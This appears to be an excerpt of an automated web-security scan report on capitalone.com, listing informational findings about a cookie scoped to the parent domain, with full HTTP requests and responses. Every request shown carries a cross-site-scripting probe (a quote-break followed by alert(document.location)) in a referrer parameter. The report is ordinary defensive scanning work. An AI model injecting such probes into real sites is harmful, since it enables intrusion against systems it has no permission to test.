Set-Cookie: bkc=KJh5NWa/asWDOded8sbgkCraani0OJ3hjPLHOYDD6AWvkATgKpYAv9FFugHvi7HHCnSGxvHnbWVGjW2NYJH9m7GvCqoAAgY/ShugRFEKEkXfdlKRsU8XfdIIqtSIZKyIT12KeyFJ7PxWN8WPlI6cIzxj5LvTBzqrYgsgyW8vd+Uk7PxP/MQQUF6B81uKNvZF7VBgwt4BEX4X2K8OH2kEhLUf/O5rLVBctc7JUpN5bEXfYsy74EX19bV1gecQfCYfvI9Vmu8Jd+YwgPxYbqYbLfqifuCyRXkeFqQE08TbR80VI3YNFfwtuddg5h0aX7ybfghVJIBEcAggVlJdXqn4MRvL2zfpLrQlezYXVBKF4ZtL2zTp17zIeXxl467IxNE52Gi+2zbfWSY8OfC0hXIgZT0NlMALIDXpyvnA7EXSe600KTtcJ2iEn2Qgp2igE2k4MeXqBp8Ccpur1yTjjlwLF7atzRH2+ob+pXF8gUCCEgfHQYK1MpSpBKIzt9I157LGaYrIatwlssFKISSzUGTOlpq644FVzK43srYgf/IEblb2Kgi4wVuLKK47XFm/g7CGqPpffNgMDlctE2k4xVXSaT64UsHUs8zrLeK1FhF7pg14sIF2m54/IlQFIdByyn5ctmNeqn6bhIPfpCpp0/DVc+487wXYrchQyy==; expires=Wed, 14-Dec-2011 11:58:29 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJ0ETtBQucUXfzF11/ZBQVsYdV24UGRZeQRsEdl4FAy1WfkCnsVQfcs2lfb1evK8Rvy5yC9VWT13nTxk0meBYhBECfnTsV/a/uhZCgwzWORnxpQf6af8U6OE5/YZdcMlWXQ3a/uTCRkOM8ZOTKv7gfbze9h91u6Qi8cCe+9XcjZUxnNhxC9VW61iP/0P/H2GcFmn86ONYEy1ecaw7Qa+6TvpnFaeVWeqKsWLuSewlyU49Lgv9kAOsbXeExR9WE2s4x==; expires=Wed, 14-Dec-2011 11:58:29 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJ0akaN/DtWRhddcGp7wp9pXiOjHARjpS6L7nis5hrRTtl9UxxVHtjj52xDa6RGIMmG09k5K5eP0xUxHCGH/WAH6sHEHgVWUxPaSHa4VX8plMw4xl+cQwsKzldmXpdzfNQq9PzHgKFUiSiKQ/K4tKRYLQ6HyluR5xVePu8I1/kRNGOkcRAp3MnZfxJKkPxedBnp+jPkMqngpnl77/WLIRviri1B6t7qXbQJ6mynCnK4tOkPSc1tEu8U/MWKgxcquSDd2/QmeUksXf8/j29VWeVz2Q/DKGWRHM49LFJHqknpTbqksjW/clmi6iqziTEwPCwtGuD4a60ocyBZLfUqtTbE5M8KwQ9XCIAxtw3oSmTbcojXqwRJyo+lTaoS7lU/xcfTbqsSJh/iX3uDa2mXVhB1v+/V8qkBGgyn3zzGW3ocUF8BsUF2+uPz4ud2ZeHttn7K0OK5/+TgbBUiapMu0W6YZMdNwTu4hHQxstW+KUhTcMM7/mr000x3HWyfuQYsqL1dEeg/KOtl0QtpmmWQE2+rWRffG/1t/tTEpKnhcNMmWMdt0SMzMywis/gJVep8cjB2KHsx2TpQ6vs6ZG20h9rSgr9R+vH7NukESZJiw0V7nh1uWzZyqX40dCm5xEUQmNRuM4CDEBXRpBfNyBiSM7C6VDlYqqnjC5aCmQu+mEdtDkDIl0qkBTye2UtBworiiSzG5YbcVPBXH8P3kqBuWLNWEpZRL/qvJDYQsPA686TLJzUL66VLF8Cn02+iUavzNfr9/Q6kN7mPSoEMPCmBDWTfpENnLOk4BMzDA0fpI053QXZtbRWZr35QY155i0dvbLzu0QKH/uZudHK58e3jAn21VvPiAsQccOe8AGANq1V3RE/ZbXJjKcCcHzdIl/oWV+0glwI4IzoEkX7ZVeppLjjgAw5rY+XSn6qubArPSoD330Rp08a/kfNrAR1NYvpvVppoeTfP0lePd9jrOJTD=; expires=Wed, 14-Dec-2011 11:58:29 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sat, 18-Jun-2011 11:58:29 GMT; path=/; domain=.bluekai.com
BK-Server: c5b
Content-Length: 321
Content-Type: text/html

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://ads.bluelithium.com/pixel?adv=23351&code=BKPGGMMSBV2&t=2&rnd=1821373188" width=1 height=1 border=0 alt="">
<img src="http://ad.yiel
...[SNIP]...

9.11. http://www.capitalone.com/css/global/portal_base.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/global/portal_base.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=29FB6279666D0428; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/global/portal_base.css HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:33 GMT
Server: Apache
Set-Cookie: v1st=29FB6279666D0428; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:22:26 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 5294
Content-Type: text/css
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

/*-----------------------------------------------------------------------------
www.capitalone.com Base Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.co
...[SNIP]...

9.12. http://www.capitalone.com/css/global/portal_common.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/global/portal_common.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=A0443C7AC9C03A80; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/global/portal_common.css HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:33 GMT
Server: Apache
Set-Cookie: v1st=A0443C7AC9C03A80; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 11 May 2011 14:14:47 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 27261
Content-Type: text/css
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

/*-----------------------------------------------------------------------------
www.capitalone.com Common Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com

...[SNIP]...

9.13. http://www.capitalone.com/css/global/portal_grid.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/global/portal_grid.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=36A4741F4351C1C5; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/global/portal_grid.css HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:33 GMT
Server: Apache
Set-Cookie: v1st=36A4741F4351C1C5; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:22:26 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 8218
Content-Type: text/css
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

/*-----------------------------------------------------------------------------
www.capitalone.com Grid Style Sheet - Based on 960.gs
version: 1.0
author: Daniel Cottner
e-mail: daniel.cot
...[SNIP]...

9.14. http://www.capitalone.com/css/global/portal_print.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/global/portal_print.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=6BEC44E31BF1D852; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/global/portal_print.css HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:33 GMT
Server: Apache
Set-Cookie: v1st=6BEC44E31BF1D852; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 11 May 2011 14:14:47 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 9601
Content-Type: text/css
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

/*-----------------------------------------------------------------------------
Capital One Print Style Sheet
version: 1.0
author: James Steincamp
e-mail: james.steincamp@capitalone.com
-
...[SNIP]...

9.15. http://www.capitalone.com/css/page-type/portal_landing-accordion.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/page-type/portal_landing-accordion.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=3356A9F2A6EF7136; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/page-type/portal_landing-accordion.css HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:33 GMT
Server: Apache
Set-Cookie: v1st=3356A9F2A6EF7136; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:22:26 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 2555
Content-Type: text/css
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

/*-----------------------------------------------------------------------------
Landing Page w/ Accordion Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.
...[SNIP]...

9.16. http://www.capitalone.com/css/page-type/portal_popup.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/page-type/portal_popup.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=D266E53D0B03223F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/page-type/portal_popup.css HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:33 GMT
Server: Apache
Set-Cookie: v1st=D266E53D0B03223F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:22:26 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 1108
Content-Type: text/css
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

.popup-lrg{
   width:760px;
}

.popup #page-body{
   padding: 0px 10px;
}

.popup #page-heading{
   margin-top:0px!important;
}

#popup-close{
   position:absolute;
   top:10px;
   right:10px;
}

...[SNIP]...

9.17. http://www.capitalone.com/css/page-type/portal_product.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/page-type/portal_product.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=1B84F757B67B6884; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/page-type/portal_product.css HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:33 GMT
Server: Apache
Set-Cookie: v1st=1B84F757B67B6884; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:22:26 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 1888
Content-Type: text/css
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

/*-----------------------------------------------------------------------------
Product Page Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
--------
...[SNIP]...

9.18. http://www.capitalone.com/css/portal_footer.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/portal_footer.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=18941BEAA04F3459; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/portal_footer.css HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:33 GMT
Server: Apache
Set-Cookie: v1st=18941BEAA04F3459; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:22:27 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 1447
Content-Type: text/css
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

/*-----------------------------------------------------------------------------
www.capitalone.com Footer Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.
...[SNIP]...

9.19. http://www.capitalone.com/css/portal_header.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/portal_header.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=FC628D4CC1E8D53; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/portal_header.css HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:33 GMT
Server: Apache
Set-Cookie: v1st=FC628D4CC1E8D53; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:22:27 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 19495
Content-Type: text/css
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

/*-----------------------------------------------------------------------------
www.capitalone.com Header Base Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capita
...[SNIP]...

9.20. http://www.capitalone.com/css/portal_page-nav-heading.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/portal_page-nav-heading.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=336BE560308D6ECB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/portal_page-nav-heading.css HTTP/1.1
Host: www.capitalone.com
